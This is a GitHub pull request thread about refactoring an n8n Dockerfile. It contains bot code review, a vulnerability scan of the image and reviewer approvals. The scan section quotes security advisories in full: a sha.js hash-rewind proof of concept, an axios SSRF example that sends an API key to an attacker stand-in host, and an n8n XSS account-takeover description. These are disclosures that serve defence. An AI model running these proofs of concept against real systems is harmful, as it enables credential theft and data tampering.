Refactor Dockerfile.n8n for improved npm package installation and env…

[SashkoMarchuk]

…ironment configuration

• Updated the npm install command to install packages directly into n8n's app directory, enhancing organization and ownership management.
• Replaced N8N_EXTERNAL_MODULES_ALLOWLIST with NODE_FUNCTION_ALLOW_EXTERNAL for better clarity in external module configuration.

These changes streamline the Docker build process and improve the overall setup for the n8n service.

Summary by CodeRabbit

• New Features
  • Added a container health check that pings the /healthz endpoint for improved monitoring.
• Chores
  • Renamed environment variable for allowing external modules to NODE_FUNCTION_ALLOW_EXTERNAL (update your configuration accordingly).
• Refactor
  • Container now runs as a non-root user for enhanced security.
  • Switched to a system-wide installation to streamline runtime behavior.
• Documentation
  • Updated comments to reflect external module handling and the new health check.

[coderabbitai]

Walkthrough

Updates Dockerfile.n8n to install n8n system-wide under /usr/local/lib/node_modules/n8n, rename the external modules env var to NODE_FUNCTION_ALLOW_EXTERNAL, add a wget-based HEALTHCHECK probing /healthz, and run the container as the non-root node user.

Changes

Cohort / File(s)	Summary
Dockerfile runtime and config updates Dockerfile.n8n	- Install path moved from /home/node/.n8n to /usr/local/lib/node_modules/n8n and ownership updated - Env var renamed: N8N_EXTERNAL_MODULES_ALLOWLIST → NODE_FUNCTION_ALLOW_EXTERNAL with same values - Added HEALTHCHECK probing http://0.0.0.0:${N8N_PORT}/healthz via wget (exec form) - Runtime user changed from root to node - Minor comment/documentation updates

Sequence Diagram(s)

sequenceDiagram
  autonumber
  participant Docker as Docker Engine
  participant Container as n8n Container
  participant App as n8n App
  participant Health as /healthz

  Note over Container,App: Container start (USER=node)
  Docker->>Container: start image
  Container->>App: launch n8n (NODE_FUNCTION_ALLOW_EXTERNAL set, system-wide modules)
  rect rgba(200,230,255,0.4)
    Note over Docker,Container: periodic health check
    Docker->>Container: exec wget -q --spider http://0.0.0.0:${N8N_PORT}/healthz
    Container->>Health: GET /healthz
    Health-->>Container: 200 OK / error
    Container-->>Docker: exit 0 / non-zero
  end

Loading

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~10 minutes

Possibly related PRs

• #65293: Update Dockerfile.n8n to install additional npm packages for markdown… #98 — Previously modified Dockerfile.n8n external-module handling and set N8N_EXTERNAL_MODULES_ALLOWLIST; directly related to env var and module installation changes.

Suggested reviewers

• anatolyshipitz
• killev

Poem

Hop hop, containers rise and shine,
Node now runs, no root in line.
Healthchecks tap the /healthz door,
External modules roam once more.
In /usr/local we snugly stay — hooray! 🐰

---

📜 Recent review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

💡 Knowledge Base configuration:

• MCP integration is disabled by default for public repositories
• Jira integration is disabled by default for public repositories
• Linear integration is disabled by default for public repositories

You can enable these sources in your CodeRabbit configuration.

📥 Commits

Reviewing files that changed from the base of the PR and between a0061ab and ef15246.

📒 Files selected for processing (1)

• Dockerfile.n8n (2 hunks)

🚧 Files skipped from review as they are similar to previous changes (1)

• Dockerfile.n8n

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)

• GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
• GitHub Check: Service Availability Check

✨ Finishing Touches

🧪 Generate unit tests

• Create PR with unit tests
• Post copyable unit tests in a comment
• Commit unit tests in branch fix/n8n-code-node-external-packages

---

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

• X
• Mastodon
• Reddit
• LinkedIn

🪧 Tips

Chat

There are 3 ways to chat with CodeRabbit:

• Review comments: Directly reply to a review comment made by CodeRabbit. Example:
  • I pushed a fix in commit <commit_id>, please review it.
  • Open a follow-up GitHub issue for this discussion.
• Files and specific lines of code (under the "Files changed" tab): Tag @coderabbitai in a new review comment at the desired location with your query.
• PR comments: Tag @coderabbitai in a new PR comment to ask questions about the PR branch. For the best results, please provide a very specific query, as very limited context is provided in this mode. Examples:
  • @coderabbitai gather interesting stats about this repository and render them as a table. Additionally, render a pie chart showing the language distribution in the codebase.
  • @coderabbitai read the files in the src/scheduler package and generate a class diagram using mermaid and a README in the markdown format.

Support

Need help? Create a ticket on our support page for assistance with any issues or questions.

CodeRabbit Commands (Invoked using PR/Issue comments)

Type @coderabbitai help to get the list of available commands.

Other keywords and placeholders

• Add @coderabbitai ignore or @coderabbit ignore anywhere in the PR description to prevent this PR from being reviewed.
• Add @coderabbitai summary to generate the high-level summary at a specific location in the PR description.
• Add @coderabbitai anywhere in the PR title to generate the title automatically.

Status, Documentation and Community

• Visit our Status Page to check the current availability of CodeRabbit.
• Visit our Documentation for detailed information on how to use CodeRabbit.
• Join our Discord Community to get help, request features, and share feedback.
• Follow us on X/Twitter for updates and announcements.

[coderabbitai]

Actionable comments posted: 0

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)

Dockerfile.n8n (1)

26-28: Healthcheck likely to fail: endpoint disabled by default, wget may be missing, and N8N_PORT isn’t exported at runtime.

• By default, /healthz is disabled unless you set QUEUE_HEALTH_CHECK_ACTIVE=true (and metrics often toggled with N8N_METRICS=true). (docs.n8n.io)
• Alpine images may not include wget; install it or use curl.
• N8N_PORT is only an ARG here, not an ENV, so ${N8N_PORT} will be empty at runtime inside /bin/sh -c.

Apply:

 ARG N8N_PORT=5678
+ENV N8N_PORT=$N8N_PORT
@@
-HEALTHCHECK --interval=30s --timeout=10s --retries=3 --start-period=30s \
-  CMD ["/bin/sh", "-c", "wget -q --spider http://0.0.0.0:${N8N_PORT}/healthz || exit 1"]
+# Enable health endpoints used by the healthcheck
+ENV N8N_METRICS=true
+ENV QUEUE_HEALTH_CHECK_ACTIVE=true
+# Ensure wget is present for the healthcheck (or switch to curl)
+USER root
+RUN apk add --no-cache wget
+USER node
+HEALTHCHECK --interval=30s --timeout=10s --retries=3 --start-period=30s \
+  CMD ["/bin/sh", "-c", "wget -q --spider http://127.0.0.1:${N8N_PORT}/healthz/readiness || exit 1"]

Notes:

• readiness checks DB connectivity, which is usually a better container health signal. (docs.n8n.io)

🧹 Nitpick comments (1)

Dockerfile.n8n (1)

13-18: Install location is correct for Code node resolution; add minor hardening and clarity.

• Keep installing into n8n’s app folder so Code/Function nodes can require these modules.
• Optional tweaks:
  • Add --omit=dev and --no-progress to reduce noise/size.
  • Consider pinning exact versions (drop the carets) for reproducible builds.
  • If future n8n upgrades replace /usr/local/lib/node_modules/n8n, document this coupling in the Dockerfile comments.

Apply if you agree:

-RUN npm install --no-audit --no-fund --ignore-scripts --prefix /usr/local/lib/node_modules/n8n \
+RUN npm install --no-audit --no-fund --ignore-scripts --omit=dev --no-progress \
+  --prefix /usr/local/lib/node_modules/n8n \
     showdown@${SHOWDOWN_VERSION} \
     slackify-markdown@${SLACKIFY_MARKDOWN_VERSION} && \
   npm cache clean --force && \
   chown -R node:node /usr/local/lib/node_modules/n8n

📜 Review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

💡 Knowledge Base configuration:

• MCP integration is disabled by default for public repositories
• Jira integration is disabled by default for public repositories
• Linear integration is disabled by default for public repositories

You can enable these sources in your CodeRabbit configuration.

📥 Commits

Reviewing files that changed from the base of the PR and between 941a7c7 and a0061ab.

📒 Files selected for processing (1)

• Dockerfile.n8n (2 hunks)

🧰 Additional context used

📓 Path-based instructions (2)

Dockerfile.{n8n,temporal}

📄 CodeRabbit inference engine (.cursor/rules/docker-configuration.mdc)

Custom Docker images must be defined using Dockerfile.n8n and Dockerfile.temporal, each extending their respective official base images with custom configurations

Files:

• Dockerfile.n8n

Dockerfile.n8n

📄 CodeRabbit inference engine (.cursor/rules/project-structure.mdc)

Use Dockerfile.n8n for custom n8n image configuration.

Files:

• Dockerfile.n8n

🧠 Learnings (4)

📓 Common learnings

Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/project-structure.mdc:0-0
Timestamp: 2025-07-28T16:44:50.073Z
Learning: Applies to Dockerfile.n8n : Use Dockerfile.n8n for custom n8n image configuration.

📚 Learning: 2025-07-28T16:44:50.073Z

Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/project-structure.mdc:0-0
Timestamp: 2025-07-28T16:44:50.073Z
Learning: Applies to Dockerfile.n8n : Use Dockerfile.n8n for custom n8n image configuration.

Applied to files:

• Dockerfile.n8n

📚 Learning: 2025-07-28T16:44:24.081Z

Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/docker-configuration.mdc:0-0
Timestamp: 2025-07-28T16:44:24.081Z
Learning: Applies to Dockerfile.{n8n,temporal} : Custom Docker images must be defined using Dockerfile.n8n and Dockerfile.temporal, each extending their respective official base images with custom configurations

Applied to files:

• Dockerfile.n8n

📚 Learning: 2025-08-10T17:34:18.486Z

Learnt from: anatolyshipitz
PR: speedandfunction/automatization#93
File: Dockerfile.n8n:7-9
Timestamp: 2025-08-10T17:34:18.486Z
Learning: The n8nio/n8n Docker images (including version 1.89.2) are Alpine Linux-based, not Debian-based. Therefore, the correct package manager to use is `apk`, not `apt-get`. Commands like `apk add --no-cache git` are appropriate for installing packages in n8nio/n8n Docker images.

Applied to files:

• Dockerfile.n8n

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)

• GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
• GitHub Check: Service Availability Check

🔇 Additional comments (3)

Dockerfile.n8n (3)

31-31: Running as non-root looks good.

Explicit USER node aligns with least-privilege best practices. No further action.

---

35-35: Comment-only change is fine.

Leaving base image CMD intact is appropriate.

---

20-21: No legacy variable references found; approval granted.

[github-actions]

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference n8n-test:latest

digest	sha256:babfe87d12278e28c261c012579068ab00fdb15d200ed3fe6a462106e5de80f2
vulnerabilities
platform	linux/amd64
size	404 MB
packages	1734

📦 Base Image node:20-alpine

also known as	20-alpine3.21 20.19-alpine 20.19-alpine3.21 20.19.0-alpine 20.19.0-alpine3.21 iron-alpine iron-alpine3.21
digest	sha256:37a5a350292926f98d48de9af160b0a3f7fcb141566117ee452742739500a5bd
vulnerabilities

stdlib 1.24.0 (golang) pkg:golang/stdlib@1.24.0 Affected range >=1.24.0-0 <1.24.2 Fixed version 1.24.2 EPSS Score 0.013% EPSS Percentile 2nd percentile Description The net/http package improperly accepts a bare LF as a line terminator in chunked data chunk-size lines. This can permit request smuggling if a net/http server is used in conjunction with a server that incorrectly accepts a bare LF as part of a chunk-ext. Affected range >=1.24.0-0 <1.24.4 Fixed version 1.24.4 EPSS Score 0.012% EPSS Percentile 1st percentile Description Calling Verify with a VerifyOptions.KeyUsages that contains ExtKeyUsageAny unintentionally disabledpolicy validation. This only affected certificate chains which contain policy graphs, which are rather uncommon.

sha.js 2.4.11 (npm) pkg:npm/sha.js@2.4.11 Improper Input Validation Affected range <=2.4.11 Fixed version 2.4.12 CVSS Score 9.1 CVSS Vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N EPSS Score 0.094% EPSS Percentile 27th percentile Description Summary This is the same as GHSA-cpq7-6gpm-g9rc but just for sha.js, as it has its own implementation. Missing input type checks can allow types other than a well-formed Buffer or string, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour. Details See PoC PoC const forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]]) const sha = require('sha.js') const { randomBytes } = require('crypto') const sha256 = (...messages) => { const hash = sha('sha256') messages.forEach((m) => hash.update(m)) return hash.digest('hex') } const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe') const receivedMessage = JSON.parse(payload) // e.g. over network, whatever console.log(sha256(...validMessage)) console.log(sha256(...receivedMessage)) console.log(receivedMessage[0]) Output: 638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4 638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4 Hashed input means safe Or just: > require('sha.js')('sha256').update('foo').digest('hex') '2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae' > require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex') '2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae' Impact Hash state rewind on {length: -x}. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash. Value miscalculation, e.g. a collision is generated by { length: buf.length, ...buf, 0: buf[0] + 256 } This will result in the same hash as of buf, but can be treated by other code differently (e.g. bn.js) DoS on {length:'1e99'} On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration)

form-data 4.0.0 (npm) pkg:npm/form-data@4.0.0 Use of Insufficiently Random Values Affected range >=4.0.0 <4.0.4 Fixed version 4.0.4 CVSS Score 9.4 CVSS Vector CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N EPSS Score 0.020% EPSS Percentile 4th percentile Description Summary form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker: can observe other values produced by Math.random in the target application, and can control one field of a request made using form-data Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request. This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work. Details The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347 An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose) PoC PoC here: https://github.com/benweissmann/CVE-2025-7783-poc Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID). Impact For an application to be vulnerable, it must: Use form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array) Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values. If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.

samlify 2.9.0 (npm) pkg:npm/samlify@2.9.0 Improper Verification of Cryptographic Signature Affected range <2.10.0 Fixed version 2.10.0 CVSS Score 9.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N EPSS Score 0.026% EPSS Percentile 6th percentile Description A Signature Wrapping attack has been found in samlify <v2.10.0, allowing an attacker to forge a SAML Response to authenticate as any user. An attacker would need a signed XML document by the identity provider.

form-data 2.5.3 (npm) pkg:npm/form-data@2.5.3 Use of Insufficiently Random Values Affected range <2.5.4 Fixed version 2.5.4 CVSS Score 9.4 CVSS Vector CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N EPSS Score 0.020% EPSS Percentile 4th percentile Description Summary form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker: can observe other values produced by Math.random in the target application, and can control one field of a request made using form-data Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request. This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work. Details The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347 An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose) PoC PoC here: https://github.com/benweissmann/CVE-2025-7783-poc Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID). Impact For an application to be vulnerable, it must: Use form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array) Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values. If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.

jq 1.7.1-r0 (apk) pkg:apk/alpine/jq@1.7.1-r0?os_name=alpine&os_version=3.21 Affected range <=1.7.1-r0 Fixed version Not Fixed EPSS Score 0.012% EPSS Percentile 1st percentile Description Affected range <=1.7.1-r0 Fixed version Not Fixed EPSS Score 0.081% EPSS Percentile 25th percentile Description

axios 1.7.4 (npm) pkg:npm/axios@1.7.4 Server-Side Request Forgery (SSRF) Affected range >=1.0.0 <1.8.2 Fixed version 1.8.2 CVSS Score 7.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P EPSS Score 0.028% EPSS Percentile 6th percentile Description Summary A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463 A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. Details Consider the following code snippet: import axios from "axios"; const internalAPIClient = axios.create({ baseURL: "http://example.test/api/v1/users/", headers: { "X-API-KEY": "1234567890", }, }); // const userId = "123"; const userId = "http://attacker.test/"; await internalAPIClient.get(userId); // SSRF In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers. It is recommended that: When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL. Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL. PoC Follow the steps below to reproduce the issue: Set up two simple HTTP servers: mkdir /tmp/server1 /tmp/server2 echo "this is server1" > /tmp/server1/index.html echo "this is server2" > /tmp/server2/index.html python -m http.server -d /tmp/server1 10001 & python -m http.server -d /tmp/server2 10002 & Create a script (e.g., main.js): import axios from "axios"; const client = axios.create({ baseURL: "http://localhost:10001/" }); const response = await client.get("http://localhost:10002/"); console.log(response.data); Run the script: $ node main.js this is server2 Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/. Impact Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed. SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running. Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

cross-spawn 7.0.3 (npm) pkg:npm/cross-spawn@7.0.3 Inefficient Regular Expression Complexity Affected range >=7.0.0 <7.0.5 Fixed version 7.0.5 CVSS Score 7.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P EPSS Score 0.109% EPSS Percentile 30th percentile Description Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.

multer 1.4.5-lts.2 (npm) pkg:npm/multer@1.4.5-lts.2 Missing Release of Memory after Effective Lifetime Affected range <2.0.0 Fixed version 2.0.0 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 0.018% EPSS Percentile 3rd percentile Description Impact Multer <2.0.0 is vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal busboy stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted. Patches Users should upgrade to 2.0.0 Workarounds None References fix: MEMORY LEAK expressjs/multer#1120 expressjs/multer@2c8505f

semver 5.3.0 (npm) pkg:npm/semver@5.3.0 Inefficient Regular Expression Complexity Affected range <5.7.2 Fixed version 5.7.2 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 0.418% EPSS Percentile 61st percentile Description Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.

openssh 9.9_p2-r0 (apk) pkg:apk/alpine/openssh@9.9_p2-r0?os_name=alpine&os_version=3.21 Affected range <=9.9_p2-r0 Fixed version Not Fixed EPSS Score 0.005% EPSS Percentile 0th percentile Description

curl 8.12.1-r1 (apk) pkg:apk/alpine/curl@8.12.1-r1?os_name=alpine&os_version=3.21 Affected range <=8.12.1-r1 Fixed version Not Fixed EPSS Score 0.036% EPSS Percentile 9th percentile Description

n8n 1.89.2 (npm) pkg:npm/n8n@1.89.2 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Affected range >=1.77.0 <1.98.2 Fixed version 1.98.2 CVSS Score 8.7 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N EPSS Score 0.033% EPSS Percentile 8th percentile Description Impact A stored Cross-Site Scripting (XSS) vulnerability was identified in n8n, specifically in the Form Trigger node's HTML form element. An authenticated attacker can inject malicious HTML via an <iframe> with a srcdoc payload that includes arbitrary JavaScript execution. The attacker can also inject malicious Javascript by using <video> coupled <source> using an onerror event. While using iframe or a combination of video and source tag, this vulnerability allows for Account Takeover (ATO) by exfiltrating n8n-browserId and session cookies from authenticated users who visit a maliciously crafted form. Using these tokens and cookies, an attacker can impersonate the victim and change account details such as email addresses, enabling full control over the account—especially if 2FA is not enabled. Patches The issue was addressed in PR #16329. Users should upgrade to version >=1.98.2. Workarounds Apart from updating to the fixed version, n8n instance administrators can: Configure a reverse proxy to serve webhook requests from a different domain [docs]. Disable or restrict use of the Form Trigger node, particularly the HTML element type. Use a Content Security Policy (CSP) to block execution of inline scripts and disallow use of srcdoc. References OWASP XSS Prevention Cheat Sheet MDN: iframe srcdoc attribute HTML: onerror attribute

pdfjs-dist 2.16.105 (npm) pkg:npm/pdfjs-dist@2.16.105 Improper Check for Unusual or Exceptional Conditions Affected range <=4.1.392 Fixed version 4.2.67 CVSS Score 8.8 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H EPSS Score 28.068% EPSS Percentile 96th percentile Description Impact If pdf.js is used to load a malicious PDF, and PDF.js is configured with isEvalSupported set to true (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain. Patches The patch removes the use of eval: mozilla/pdf.js#18015 Workarounds Set the option isEvalSupported to false. References https://bugzilla.mozilla.org/show_bug.cgi?id=1893645

tar-fs 2.1.2 (npm) pkg:npm/tar-fs@2.1.2 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Affected range >=2.0.0 <2.1.3 Fixed version 2.1.3 CVSS Score 8.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N EPSS Score 0.110% EPSS Percentile 30th percentile Description Impact v3.0.8, v2.1.2, v1.16.4 and below Patches Has been patched in 3.0.9, 2.1.3, and 1.16.5 Workarounds You can use the ignore option to ignore non files/directories. ignore (_, header) { // pass files & directories, ignore e.g. symlinks return header.type !== 'file' && header.type !== 'directory' } Credit Thank you Caleb Brown from Google Open Source Security Team for reporting this in detail.

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

[killev]

Looks good

[anatolyshipitz]

looks good